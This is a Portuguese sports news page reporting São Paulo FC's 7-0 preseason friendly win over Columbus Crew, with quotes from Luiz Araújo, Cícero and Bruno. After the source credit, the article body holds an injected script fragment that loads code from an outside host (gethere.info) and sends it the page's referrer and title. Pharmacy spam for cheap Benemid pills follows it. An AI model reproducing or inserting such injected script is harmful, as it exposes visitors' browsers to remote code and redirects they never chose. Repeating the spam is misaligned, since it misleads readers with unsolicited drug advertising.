Ultimas Noticias

Fim da Pré Temporada do São Paulo e sensação de missão cumprida! Veja os gols de hoje!

A partir do próximo final de semana, diante do Grêmio Osasco Audax, o Tricolor iniciará a sua trajetória nas competições de 2017. Por isso, para dar mais ritmo de jogo ao elenco e dar mais uma oportunidade para o técnico Rogério Ceni observar melhor os atletas, o São Paulo disputou um jogo-treino contra o Columbus Crew-EUA (7 x 0) neste domingo (29).

A partida amistosa, realizada no CFA Laudo Natel, em Cotia, foi exaltada pelos jogadores são-paulinos. “O jogo-treino foi muito bom para dar mais ritmo de jogo. A equipe se comportou bem e soube conquistar a vitória. Além disso, foi importante para o Rogério observar os jogadores de olho na estreia do Campeonato Paulista. Queremos começar o ano bem, com o pé direito, porque a nossa meta é ter uma temporada vitoriosa”, afirmou o atacante Luiz Araújo.


Até aqui, além do embate deste final de semana, a pré-temporada tricolor contou com dois jogos-treino nos Estados Unidos – diante de Sarasota FC e Boca Raton FC -, a disputa da Florida Cup e uma série de atividades técnicas e táticas – todas dinâmicas e com alta intensidade. De acordo com os atletas, o período de preparação tem sido produtivo e cada vez mais ajusta o time para o Campeonato Paulista e a Copa do Brasil.

“É importante adquirir ritmo de jogo, porque isso ajuda bastante na preparação. Temos aperfeiçoado a parte tática e aprimorado a nossa condição física a cada nova atividade, como o jogo treino deste domingo. Ainda temos mais uma semana de treinos antes da estreia, mas já vejo nosso elenco mais forte. Partidas como esta, contra o Columbus Crew, ajudam bastante na preparação”, avaliou o meio-campista Cícero, um dos atletas mais experientes do grupo.

O jogo-treino deste final de semana foi dividido em quatro tempos de 25 minutos cada, e duas equipes foram utilizadas: dois tempos para cada formação. Com gols de Cícero, Thiago Mendes, Wellington Nem, Chavez – na primeira parte – Gilberto, Neilton e Wesley – na etapa complementar -, o São Paulo bateu o adversário por 7 a 0.

“Nossa preparação tem sido excelente. Junto com o Rogério temos acertado o time para adquirir mais confiança antes do Paulista. O jogo-treino foi bom, porque sempre tiramos algumas lições em partidas assim. Vamos corrigir alguns erros para chegarmos bem na estreia do estadual. Vamos em busca de vitórias desde o primeiro jogo”, finalizou Bruno.

Fonte: Blog do São Paulos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Searching for a cost effective solution to buy your Benemid? You can get it for as much as 1.06 right now! pills store

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Ultimas Noticias

Mais em Ultimas Noticias

Hora de matar a saudade da torcida: “Faremos do Morumbi a nossa força”

saopauloadmin19 de Janeiro de 2018

FOX: Apodi interessa ao São Paulo

saopauloadmin19 de Janeiro de 2018

Petros é favorito a ser o novo capitão do São Paulo

saopauloadmin19 de Janeiro de 2018

Time do São Paulo na Copinha pode ganhar três reforços do profissional

saopauloadmin19 de Janeiro de 2018

São Paulo pensa novamente em Carlos Eduardo

saopauloadmin18 de Janeiro de 2018

Sem dinheiro, São Paulo quer paciência com a base

saopauloadmin18 de Janeiro de 2018

Dupla da base se adapta ao jogo e é alento na fraca estreia do São Paulo

saopauloadmin18 de Janeiro de 2018

Dorival confirma Brenner e Sidão, mas descarta trio para sábado

saopauloadmin18 de Janeiro de 2018

Entenda por que o São Paulo perdeu do São Bento na estreia do Paulistão

saopauloadmin18 de Janeiro de 2018